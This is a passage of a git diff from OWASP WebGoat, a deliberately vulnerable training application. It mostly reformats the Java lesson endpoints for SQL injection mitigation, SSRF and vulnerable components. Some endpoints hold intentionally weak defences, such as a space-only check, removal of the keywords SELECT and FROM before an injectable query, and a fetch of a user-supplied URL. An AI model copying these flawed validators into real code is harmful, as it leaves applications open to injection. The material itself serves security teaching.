+  @PostMapping("/SqlInjectionMitigations/attack10a")
+  @ResponseBody
+  public AttackResult completed(
+      @RequestParam String field1,
+      @RequestParam String field2,
+      @RequestParam String field3,
+      @RequestParam String field4,
+      @RequestParam String field5,
+      @RequestParam String field6,
+      @RequestParam String field7) {
+    String[] userInput = {field1, field2, field3, field4, field5, field6, field7};
+    int position = 0;
+    boolean completed = false;
+    for (String input : userInput) {
+      if (input.toLowerCase().contains(this.results[position].toLowerCase())) {
+        completed = true;
+      } else {
         return failed(this).build();
+      }
+      position++;
     }
+    if (completed) {
+      return success(this).build();
+    }
+    return failed(this).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
index 106cf457e..325d376bb 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson10b.java
@@ -22,6 +22,19 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
+import java.io.IOException;
+import java.net.URI;
+import java.util.Arrays;
+import java.util.List;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import javax.tools.Diagnostic;
+import javax.tools.DiagnosticCollector;
+import javax.tools.JavaCompiler;
+import javax.tools.JavaFileObject;
+import javax.tools.SimpleJavaFileObject;
+import javax.tools.StandardJavaFileManager;
+import javax.tools.ToolProvider;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -30,108 +43,112 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.tools.Diagnostic;
-import javax.tools.DiagnosticCollector;
-import javax.tools.JavaCompiler;
-import javax.tools.JavaFileObject;
-import javax.tools.SimpleJavaFileObject;
-import javax.tools.StandardJavaFileManager;
-import javax.tools.ToolProvider;
-import java.io.IOException;
-import java.net.URI;
-import java.util.Arrays;
-import java.util.List;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint-mitigation-10b-1", "SqlStringInjectionHint-mitigation-10b-2", "SqlStringInjectionHint-mitigation-10b-3", "SqlStringInjectionHint-mitigation-10b-4", "SqlStringInjectionHint-mitigation-10b-5"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint-mitigation-10b-1",
+      "SqlStringInjectionHint-mitigation-10b-2",
+      "SqlStringInjectionHint-mitigation-10b-3",
+      "SqlStringInjectionHint-mitigation-10b-4",
+      "SqlStringInjectionHint-mitigation-10b-5"
+    })
 public class SqlInjectionLesson10b extends AssignmentEndpoint {
 
-    @PostMapping("/SqlInjectionMitigations/attack10b")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String editor) {
-        try {
-            if (editor.isEmpty()) return failed(this).feedback("sql-injection.10b.no-code").build();
+  @PostMapping("/SqlInjectionMitigations/attack10b")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String editor) {
+    try {
+      if (editor.isEmpty()) return failed(this).feedback("sql-injection.10b.no-code").build();
 
-            editor = editor.replaceAll("\\<.*?>", "");
+      editor = editor.replaceAll("\\<.*?>", "");
 
-            String regexSetsUpConnection = "(?=.*getConnection.*)";
-            String regexUsesPreparedStatement = "(?=.*PreparedStatement.*)";
-            String regexUsesPlaceholder = "(?=.*\\=\\?.*|.*\\=\\s\\?.*)";
-            String regexUsesSetString = "(?=.*setString.*)";
-            String regexUsesExecute = "(?=.*execute.*)";
-            String regexUsesExecuteUpdate = "(?=.*executeUpdate.*)";
+      String regexSetsUpConnection = "(?=.*getConnection.*)";
+      String regexUsesPreparedStatement = "(?=.*PreparedStatement.*)";
+      String regexUsesPlaceholder = "(?=.*\\=\\?.*|.*\\=\\s\\?.*)";
+      String regexUsesSetString = "(?=.*setString.*)";
+      String regexUsesExecute = "(?=.*execute.*)";
+      String regexUsesExecuteUpdate = "(?=.*executeUpdate.*)";
 
-            String codeline = editor.replace("\n", "").replace("\r", "");
+      String codeline = editor.replace("\n", "").replace("\r", "");
 
-            boolean setsUpConnection = this.check_text(regexSetsUpConnection, codeline);
-            boolean usesPreparedStatement = this.check_text(regexUsesPreparedStatement, codeline);
-            boolean usesSetString = this.check_text(regexUsesSetString, codeline);
-            boolean usesPlaceholder = this.check_text(regexUsesPlaceholder, codeline);
-            boolean usesExecute = this.check_text(regexUsesExecute, codeline);
-            boolean usesExecuteUpdate = this.check_text(regexUsesExecuteUpdate, codeline);
+      boolean setsUpConnection = this.check_text(regexSetsUpConnection, codeline);
+      boolean usesPreparedStatement = this.check_text(regexUsesPreparedStatement, codeline);
+      boolean usesSetString = this.check_text(regexUsesSetString, codeline);
+      boolean usesPlaceholder = this.check_text(regexUsesPlaceholder, codeline);
+      boolean usesExecute = this.check_text(regexUsesExecute, codeline);
+      boolean usesExecuteUpdate = this.check_text(regexUsesExecuteUpdate, codeline);
 
-            boolean hasImportant = (setsUpConnection && usesPreparedStatement && usesPlaceholder && usesSetString && (usesExecute || usesExecuteUpdate));
-            List<Diagnostic> hasCompiled = this.compileFromString(editor);
+      boolean hasImportant =
+          (setsUpConnection
+              && usesPreparedStatement
+              && usesPlaceholder
+              && usesSetString
+              && (usesExecute || usesExecuteUpdate));
+      List<Diagnostic> hasCompiled = this.compileFromString(editor);
 
-            if (hasImportant && hasCompiled.size() < 1) {
-                return success(this).feedback("sql-injection.10b.success").build();
-            } else if (hasCompiled.size() > 0) {
-                String errors = "";
-                for (Diagnostic d : hasCompiled) {
-                    errors += d.getMessage(null) + "<br>";
-                }
-                return failed(this).feedback("sql-injection.10b.compiler-errors").output(errors).build();
-            } else {
-                return failed(this).feedback("sql-injection.10b.failed").build();
-            }
-        } catch (Exception e) {
-            return failed(this).output(e.getMessage()).build();
+      if (hasImportant && hasCompiled.size() < 1) {
+        return success(this).feedback("sql-injection.10b.success").build();
+      } else if (hasCompiled.size() > 0) {
+        String errors = "";
+        for (Diagnostic d : hasCompiled) {
+          errors += d.getMessage(null) + "<br>";
         }
+        return failed(this).feedback("sql-injection.10b.compiler-errors").output(errors).build();
+      } else {
+        return failed(this).feedback("sql-injection.10b.failed").build();
+      }
+    } catch (Exception e) {
+      return failed(this).output(e.getMessage()).build();
+    }
+  }
+
+  private List<Diagnostic> compileFromString(String s) {
+    JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
+    DiagnosticCollector diagnosticsCollector = new DiagnosticCollector();
+    StandardJavaFileManager fileManager =
+        compiler.getStandardFileManager(diagnosticsCollector, null, null);
+    JavaFileObject javaObjectFromString = getJavaFileContentsAsString(s);
+    Iterable fileObjects = Arrays.asList(javaObjectFromString);
+    JavaCompiler.CompilationTask task =
+        compiler.getTask(null, fileManager, diagnosticsCollector, null, null, fileObjects);
+    Boolean result = task.call();
+    List<Diagnostic> diagnostics = diagnosticsCollector.getDiagnostics();
+    return diagnostics;
+  }
+
+  private SimpleJavaFileObject getJavaFileContentsAsString(String s) {
+    StringBuilder javaFileContents =
+        new StringBuilder(
+            "import java.sql.*; public class TestClass { static String DBUSER; static String DBPW;"
+                + " static String DBURL; public static void main(String[] args) {"
+                + s
+                + "}}");
+    JavaObjectFromString javaFileObject = null;
+    try {
+      javaFileObject = new JavaObjectFromString("TestClass.java", javaFileContents.toString());
+    } catch (Exception exception) {
+      exception.printStackTrace();
+    }
+    return javaFileObject;
+  }
+
+  class JavaObjectFromString extends SimpleJavaFileObject {
+    private String contents = null;
+
+    public JavaObjectFromString(String className, String contents) throws Exception {
+      super(new URI(className), Kind.SOURCE);
+      this.contents = contents;
     }
 
-    private List<Diagnostic> compileFromString(String s) {
-        JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
-        DiagnosticCollector diagnosticsCollector = new DiagnosticCollector();
-        StandardJavaFileManager fileManager = compiler.getStandardFileManager(diagnosticsCollector, null, null);
-        JavaFileObject javaObjectFromString = getJavaFileContentsAsString(s);
-        Iterable fileObjects = Arrays.asList(javaObjectFromString);
-        JavaCompiler.CompilationTask task = compiler.getTask(null, fileManager, diagnosticsCollector, null, null, fileObjects);
-        Boolean result = task.call();
-        List<Diagnostic> diagnostics = diagnosticsCollector.getDiagnostics();
-        return diagnostics;
+    public CharSequence getCharContent(boolean ignoreEncodingErrors) throws IOException {
+      return contents;
     }
+  }
 
-    private SimpleJavaFileObject getJavaFileContentsAsString(String s) {
-        StringBuilder javaFileContents = new StringBuilder("import java.sql.*; public class TestClass { static String DBUSER; static String DBPW; static String DBURL; public static void main(String[] args) {" + s + "}}");
-        JavaObjectFromString javaFileObject = null;
-        try {
-            javaFileObject = new JavaObjectFromString("TestClass.java", javaFileContents.toString());
-        } catch (Exception exception) {
-            exception.printStackTrace();
-        }
-        return javaFileObject;
-    }
-
-    class JavaObjectFromString extends SimpleJavaFileObject {
-        private String contents = null;
-
-        public JavaObjectFromString(String className, String contents) throws Exception {
-            super(new URI(className), Kind.SOURCE);
-            this.contents = contents;
-        }
-
-        public CharSequence getCharContent(boolean ignoreEncodingErrors) throws IOException {
-            return contents;
-        }
-    }
-
-    private boolean check_text(String regex, String text) {
-        Pattern p = Pattern.compile(regex, Pattern.CASE_INSENSITIVE);
-        Matcher m = p.matcher(text);
-        if (m.find())
-            return true;
-        else return false;
-    }
+  private boolean check_text(String regex, String text) {
+    Pattern p = Pattern.compile(regex, Pattern.CASE_INSENSITIVE);
+    Matcher m = p.matcher(text);
+    if (m.find()) return true;
+    else return false;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
index c94e65b67..453f0e3e1 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionLesson13.java
@@ -22,6 +22,10 @@
 
 package org.owasp.webgoat.lessons.sqlinjection.mitigation;
 
+import java.sql.Connection;
+import java.sql.PreparedStatement;
+import java.sql.ResultSet;
+import java.sql.SQLException;
 import lombok.extern.slf4j.Slf4j;
 import org.owasp.webgoat.container.LessonDataSource;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -32,37 +36,39 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-
 @RestController
-@AssignmentHints(value = {"SqlStringInjectionHint-mitigation-13-1", "SqlStringInjectionHint-mitigation-13-2", "SqlStringInjectionHint-mitigation-13-3", "SqlStringInjectionHint-mitigation-13-4"})
+@AssignmentHints(
+    value = {
+      "SqlStringInjectionHint-mitigation-13-1",
+      "SqlStringInjectionHint-mitigation-13-2",
+      "SqlStringInjectionHint-mitigation-13-3",
+      "SqlStringInjectionHint-mitigation-13-4"
+    })
 @Slf4j
 public class SqlInjectionLesson13 extends AssignmentEndpoint {
 
-    private final LessonDataSource dataSource;
+  private final LessonDataSource dataSource;
 
-    public SqlInjectionLesson13(LessonDataSource dataSource) {
-        this.dataSource = dataSource;
-    }
+  public SqlInjectionLesson13(LessonDataSource dataSource) {
+    this.dataSource = dataSource;
+  }
 
-    @PostMapping("/SqlInjectionMitigations/attack12a")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String ip) {
-        try (Connection connection = dataSource.getConnection();
-             PreparedStatement preparedStatement = connection.prepareStatement("select ip from servers where ip = ? and hostname = ?")) {
-            preparedStatement.setString(1, ip);
-            preparedStatement.setString(2, "webgoat-prd");
-            ResultSet resultSet = preparedStatement.executeQuery();
-            if (resultSet.next()) {
-                return success(this).build();
-            }
-            return failed(this).build();
-        } catch (SQLException e) {
-            log.error("Failed", e);
-            return (failed(this).build());
-        }
+  @PostMapping("/SqlInjectionMitigations/attack12a")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String ip) {
+    try (Connection connection = dataSource.getConnection();
+        PreparedStatement preparedStatement =
+            connection.prepareStatement("select ip from servers where ip = ? and hostname = ?")) {
+      preparedStatement.setString(1, ip);
+      preparedStatement.setString(2, "webgoat-prd");
+      ResultSet resultSet = preparedStatement.executeQuery();
+      if (resultSet.next()) {
+        return success(this).build();
+      }
+      return failed(this).build();
+    } catch (SQLException e) {
+      log.error("Failed", e);
+      return (failed(this).build());
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
index 417790c45..8ed3e0c1b 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlInjectionMitigations.java
@@ -28,13 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class SqlInjectionMitigations extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "3.sql.mitigation.title";
-    }
+  @Override
+  public String getTitle() {
+    return "3.sql.mitigation.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
index 42136180e..4cfec6337 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidation.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -32,24 +31,29 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
-@AssignmentHints(value = {"SqlOnlyInputValidation-1", "SqlOnlyInputValidation-2", "SqlOnlyInputValidation-3"})
+@AssignmentHints(
+    value = {"SqlOnlyInputValidation-1", "SqlOnlyInputValidation-2", "SqlOnlyInputValidation-3"})
 public class SqlOnlyInputValidation extends AssignmentEndpoint {
 
-    private final SqlInjectionLesson6a lesson6a;
+  private final SqlInjectionLesson6a lesson6a;
 
-    public SqlOnlyInputValidation(SqlInjectionLesson6a lesson6a) {
-        this.lesson6a = lesson6a;
-    }
+  public SqlOnlyInputValidation(SqlInjectionLesson6a lesson6a) {
+    this.lesson6a = lesson6a;
+  }
 
-    @PostMapping("/SqlOnlyInputValidation/attack")
-    @ResponseBody
-    public AttackResult attack(@RequestParam("userid_sql_only_input_validation") String userId) {
-        if (userId.contains(" ")) {
-            return failed(this).feedback("SqlOnlyInputValidation-failed").build();
-        }
-        AttackResult attackResult = lesson6a.injectableQuery(userId);
-        return new AttackResult(attackResult.isLessonCompleted(), attackResult.getFeedback(), attackResult.getOutput(), getClass().getSimpleName(), true);
+  @PostMapping("/SqlOnlyInputValidation/attack")
+  @ResponseBody
+  public AttackResult attack(@RequestParam("userid_sql_only_input_validation") String userId) {
+    if (userId.contains(" ")) {
+      return failed(this).feedback("SqlOnlyInputValidation-failed").build();
     }
+    AttackResult attackResult = lesson6a.injectableQuery(userId);
+    return new AttackResult(
+        attackResult.isLessonCompleted(),
+        attackResult.getFeedback(),
+        attackResult.getOutput(),
+        getClass().getSimpleName(),
+        true);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
index 5e93dae55..3a324bc65 100644
--- a/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/sqlinjection/mitigation/SqlOnlyInputValidationOnKeywords.java
@@ -1,4 +1,3 @@
-
 /*
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
  *
@@ -32,25 +31,35 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
-@AssignmentHints(value = {"SqlOnlyInputValidationOnKeywords-1", "SqlOnlyInputValidationOnKeywords-2", "SqlOnlyInputValidationOnKeywords-3"})
+@AssignmentHints(
+    value = {
+      "SqlOnlyInputValidationOnKeywords-1",
+      "SqlOnlyInputValidationOnKeywords-2",
+      "SqlOnlyInputValidationOnKeywords-3"
+    })
 public class SqlOnlyInputValidationOnKeywords extends AssignmentEndpoint {
 
-    private final SqlInjectionLesson6a lesson6a;
+  private final SqlInjectionLesson6a lesson6a;
 
-    public SqlOnlyInputValidationOnKeywords(SqlInjectionLesson6a lesson6a) {
-        this.lesson6a = lesson6a;
-    }
+  public SqlOnlyInputValidationOnKeywords(SqlInjectionLesson6a lesson6a) {
+    this.lesson6a = lesson6a;
+  }
 
-    @PostMapping("/SqlOnlyInputValidationOnKeywords/attack")
-    @ResponseBody
-    public AttackResult attack(@RequestParam("userid_sql_only_input_validation_on_keywords") String userId) {
-        userId = userId.toUpperCase().replace("FROM", "").replace("SELECT", "");
-        if (userId.contains(" ")) {
-            return failed(this).feedback("SqlOnlyInputValidationOnKeywords-failed").build();
-        }
-        AttackResult attackResult = lesson6a.injectableQuery(userId);
-        return new AttackResult(attackResult.isLessonCompleted(), attackResult.getFeedback(), attackResult.getOutput(), getClass().getSimpleName(), true);
+  @PostMapping("/SqlOnlyInputValidationOnKeywords/attack")
+  @ResponseBody
+  public AttackResult attack(
+      @RequestParam("userid_sql_only_input_validation_on_keywords") String userId) {
+    userId = userId.toUpperCase().replace("FROM", "").replace("SELECT", "");
+    if (userId.contains(" ")) {
+      return failed(this).feedback("SqlOnlyInputValidationOnKeywords-failed").build();
     }
+    AttackResult attackResult = lesson6a.injectableQuery(userId);
+    return new AttackResult(
+        attackResult.isLessonCompleted(),
+        attackResult.getFeedback(),
+        attackResult.getOutput(),
+        getClass().getSimpleName(),
+        true);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
index d82cf3d9d..7a4d788d2 100644
--- a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRF.java
@@ -8,25 +8,26 @@ import org.springframework.stereotype.Component;
  * ************************************************************************************************
  * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
  * please see http://www.owasp.org/
- * <p>
- * Copyright (c) 2002 - 2014 Bruce Mayhew
- * <p>
- * This program is free software; you can redistribute it and/or modify it under the terms of the
+ *
+ * <p>Copyright (c) 2002 - 2014 Bruce Mayhew
+ *
+ * <p>This program is free software; you can redistribute it and/or modify it under the terms of the
  * GNU General Public License as published by the Free Software Foundation; either version 2 of the
  * License, or (at your option) any later version.
- * <p>
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * <p>
- * You should have received a copy of the GNU General Public License along with this program; if
+ *
+ * <p>This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
+ * without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * <p>You should have received a copy of the GNU General Public License along with this program; if
  * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
  * 02111-1307, USA.
- * <p>
- * Getting Source ==============
- * <p>
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
+ *
+ * <p>Getting Source ==============
+ *
+ * <p>Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
  * <p>
  *
  * @author WebGoat
@@ -35,13 +36,13 @@ import org.springframework.stereotype.Component;
  */
 @Component
 public class SSRF extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A10;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A10;
+  }
 
-    @Override
-    public String getTitle() {
-        return "ssrf.title";
-    }
+  @Override
+  public String getTitle() {
+    return "ssrf.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
index 6f12b3d9d..210c98421 100644
--- a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask1.java
@@ -30,45 +30,37 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-
 @RestController
 @AssignmentHints({"ssrf.hint1", "ssrf.hint2"})
 public class SSRFTask1 extends AssignmentEndpoint {
 
-    @PostMapping("/SSRF/task1")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String url) {
-        return stealTheCheese(url);
-    }
+  @PostMapping("/SSRF/task1")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String url) {
+    return stealTheCheese(url);
+  }
 
-    protected AttackResult stealTheCheese(String url) {
-        try {
-            StringBuilder html = new StringBuilder();
+  protected AttackResult stealTheCheese(String url) {
+    try {
+      StringBuilder html = new StringBuilder();
 
-            if (url.matches("images/tom.png")) {
-                html.append("<img class=\"image\" alt=\"Tom\" src=\"images/tom.png\" width=\"25%\" height=\"25%\">");
-                return failed(this)
-                        .feedback("ssrf.tom")
-                        .output(html.toString())
-                        .build();
-            } else if (url.matches("images/jerry.png")) {
-                html.append("<img class=\"image\" alt=\"Jerry\" src=\"images/jerry.png\" width=\"25%\" height=\"25%\">");
-                return success(this)
-                        .feedback("ssrf.success")
-                        .output(html.toString())
-                        .build();
-            } else {
-                html.append("<img class=\"image\" alt=\"Silly Cat\" src=\"images/cat.jpg\">");
-                return failed(this)
-                        .feedback("ssrf.failure")
-                        .output(html.toString())
-                        .build();
-            }
-        } catch (Exception e) {
-            e.printStackTrace();
-            return failed(this)
-                    .output(e.getMessage())
-                    .build();
-        }
+      if (url.matches("images/tom.png")) {
+        html.append(
+            "<img class=\"image\" alt=\"Tom\" src=\"images/tom.png\" width=\"25%\""
+                + " height=\"25%\">");
+        return failed(this).feedback("ssrf.tom").output(html.toString()).build();
+      } else if (url.matches("images/jerry.png")) {
+        html.append(
+            "<img class=\"image\" alt=\"Jerry\" src=\"images/jerry.png\" width=\"25%\""
+                + " height=\"25%\">");
+        return success(this).feedback("ssrf.success").output(html.toString()).build();
+      } else {
+        html.append("<img class=\"image\" alt=\"Silly Cat\" src=\"images/cat.jpg\">");
+        return failed(this).feedback("ssrf.failure").output(html.toString()).build();
+      }
+    } catch (Exception e) {
+      e.printStackTrace();
+      return failed(this).output(e.getMessage()).build();
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
index 4dd4f2759..cb58bd63d 100644
--- a/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
+++ b/src/main/java/org/owasp/webgoat/lessons/ssrf/SSRFTask2.java
@@ -22,6 +22,11 @@
 
 package org.owasp.webgoat.lessons.ssrf;
 
+import java.io.IOException;
+import java.io.InputStream;
+import java.net.MalformedURLException;
+import java.net.URL;
+import java.nio.charset.StandardCharsets;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
@@ -30,49 +35,38 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.io.IOException;
-import java.io.InputStream;
-import java.net.MalformedURLException;
-import java.net.URL;
-import java.nio.charset.StandardCharsets;
-
-
 @RestController
 @AssignmentHints({"ssrf.hint3"})
 public class SSRFTask2 extends AssignmentEndpoint {
 
-    @PostMapping("/SSRF/task2")
-    @ResponseBody
-    public AttackResult completed(@RequestParam String url) {
-        return furBall(url);
-    }
+  @PostMapping("/SSRF/task2")
+  @ResponseBody
+  public AttackResult completed(@RequestParam String url) {
+    return furBall(url);
+  }
 
-    protected AttackResult furBall(String url) {
-        if (url.matches("http://ifconfig.pro")) {
-            String html;
-            try (InputStream in = new URL(url).openStream()) {
-                html = new String(in.readAllBytes(), StandardCharsets.UTF_8)
-                        .replaceAll("\n","<br>"); // Otherwise the \n gets escaped in the response
-            } catch (MalformedURLException e) {
-                return getFailedResult(e.getMessage());
-            } catch (IOException e) {
-                //in case the external site is down, the test and lesson should still be ok
-                html = "<html><body>Although the http://ifconfig.pro site is down, you still managed to solve" +
-                        " this exercise the right way!</body></html>";
-            }
-            return success(this)
-                    .feedback("ssrf.success")
-                    .output(html)
-                    .build();
-        }
-        var html = "<img class=\"image\" alt=\"image post\" src=\"images/cat.jpg\">";
-        return getFailedResult(html);
+  protected AttackResult furBall(String url) {
+    if (url.matches("http://ifconfig.pro")) {
+      String html;
+      try (InputStream in = new URL(url).openStream()) {
+        html =
+            new String(in.readAllBytes(), StandardCharsets.UTF_8)
+                .replaceAll("\n", "<br>"); // Otherwise the \n gets escaped in the response
+      } catch (MalformedURLException e) {
+        return getFailedResult(e.getMessage());
+      } catch (IOException e) {
+        // in case the external site is down, the test and lesson should still be ok
+        html =
+            "<html><body>Although the http://ifconfig.pro site is down, you still managed to solve"
+                + " this exercise the right way!</body></html>";
+      }
+      return success(this).feedback("ssrf.success").output(html).build();
     }
+    var html = "<img class=\"image\" alt=\"image post\" src=\"images/cat.jpg\">";
+    return getFailedResult(html);
+  }
 
-    private AttackResult getFailedResult(String errorMsg) {
-        return failed(this)
-                .feedback("ssrf.failure")
-                .output(errorMsg)
-                .build();
-    }
+  private AttackResult getFailedResult(String errorMsg) {
+    return failed(this).feedback("ssrf.failure").output(errorMsg).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
index 4b603b993..32c4df24a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/Contact.java
@@ -24,12 +24,19 @@ package org.owasp.webgoat.lessons.vulnerablecomponents;
 
 public interface Contact {
 
-	public Integer getId();
-	public void setId(Integer id);
-	public String getFirstName();
-	public void setFirstName(String firstName);
-	public String getLastName();
-	public void setLastName(String lastName);
-	public String getEmail();
-	public void setEmail(String email);
+  public Integer getId();
+
+  public void setId(Integer id);
+
+  public String getFirstName();
+
+  public void setFirstName(String firstName);
+
+  public String getLastName();
+
+  public void setLastName(String lastName);
+
+  public String getEmail();
+
+  public void setEmail(String email);
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
index 541b18bfb..f69b253e7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/ContactImpl.java
@@ -27,9 +27,8 @@ import lombok.Data;
 @Data
 public class ContactImpl implements Contact {
 
-	private Integer id;
-	private String firstName;
-	private String lastName;
-	private String email;
-
+  private Integer id;
+  private String firstName;
+  private String lastName;
+  private String email;
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
index 4340d6edf..a868727db 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponents.java
@@ -28,14 +28,13 @@ import org.springframework.stereotype.Component;
 
 @Component
 public class VulnerableComponents extends Lesson {
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A6;
-    }
-
-    @Override
-    public String getTitle() {
-        return "vulnerable-components.title";
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A6;
+  }
 
+  @Override
+  public String getTitle() {
+    return "vulnerable-components.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
index 5487e7e33..ad1a91cc4 100644
--- a/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
+++ b/src/main/java/org/owasp/webgoat/lessons/vulnerablecomponents/VulnerableComponentsLesson.java
@@ -36,34 +36,40 @@ import org.springframework.web.bind.annotation.RestController;
 @AssignmentHints({"vulnerable.hint"})
 public class VulnerableComponentsLesson extends AssignmentEndpoint {
 
-    @PostMapping("/VulnerableComponents/attack1")
-    public @ResponseBody
